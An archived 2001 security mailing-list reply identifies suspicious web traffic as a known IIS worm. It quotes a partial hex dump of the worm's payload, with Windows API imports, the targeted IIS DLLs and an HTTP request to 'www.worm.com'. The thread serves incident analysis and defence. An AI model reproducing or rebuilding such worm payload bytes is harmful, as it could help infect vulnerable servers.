Security Incidents mailing list archives
Re: Strange web traffic
From: Ryan Russell <ryan () securityfocus com>
Date: Tue, 17 Jul 2001 14:03:39 -0600 (MDT)
That is indeed a worm, though you're missing the first part of the conversation. This is the worm that Marc from eeye has been posting about, I saw a post to incidents about it arrive shortly before this one, forwarded from Aleph1. Ryan On Tue, 17 Jul 2001, Scott Nursten wrote:
0x01c0 2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f *.L.3.........Lo 0x01d0 6164 4c69 6272 6172 7941 0047 6574 5379 adLibraryA.GetSy 0x01e0 7374 656d 5469 6d65 0043 7265 6174 6554 stemTime.CreateT 0x01f0 6872 6561 6400 4372 6561 7465 4669 6c65 hread.CreateFile 0x0200 4100 536c 6565 7000 4765 7453 7973 7465 A.Sleep.GetSyste 0x0210 6d44 6566 6175 6c74 4c61 6e67 4944 0056 mDefaultLangID.V 0x0220 6972 7475 616c 5072 6f74 6563 7400 0969 irtualProtect..i 0x0230 6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053 nfocomm.dll.TcpS 0x0240 6f63 6b53 656e 6400 0957 5332 5f33 322e ockSend..WS2_32. 0x0250 646c 6c00 736f 636b 6574 0063 6f6e 6e65 dll.socket.conne 0x0260 6374 0073 656e 6400 7265 6376 0063 6c6f ct.send.recv.clo 0x0270 7365 736f 636b 6574 0009 7733 7376 632e sesocket..w3svc. 0x0280 646c 6c00 0047 4554 2000 3f00 2020 4854 dll..GET..?...HT 0x0290 5450 2f31 2e30 0d0a 436f 6e74 656e 742d TP/1.0..Content- 0x02a0 7479 7065 3a20 7465 7874 2f78 6d6c 0a48 type:.text/xml.H 0x02b0 4f53 543a 7777 772e 776f 726d 2e63 6f6d OST:www.worm.com 0x02c0 0a20 4163 6365 7074 3a20 2a2f 2a0a 436f ..Accept:.*/*.Co 0x02d0 6e74 656e 742d 6c65 6e67 7468 3a20 3335 ntent-length:.35 0x02e0 3639 200d 0a0d 0a00 633a 5c6e 6f74 776f 69......c:\notwo 0x02f0 726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c rm.LMTH..<html><
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Strange web traffic Scott Nursten (Jul 17)
- Re: Strange web traffic Scott Nursten (Jul 17)
- Re(2): Strange web traffic Ken Eichman (Jul 17)
- Re: Strange web traffic Ryan Russell (Jul 17)
- Re: Strange web traffic Scott Nursten (Jul 17)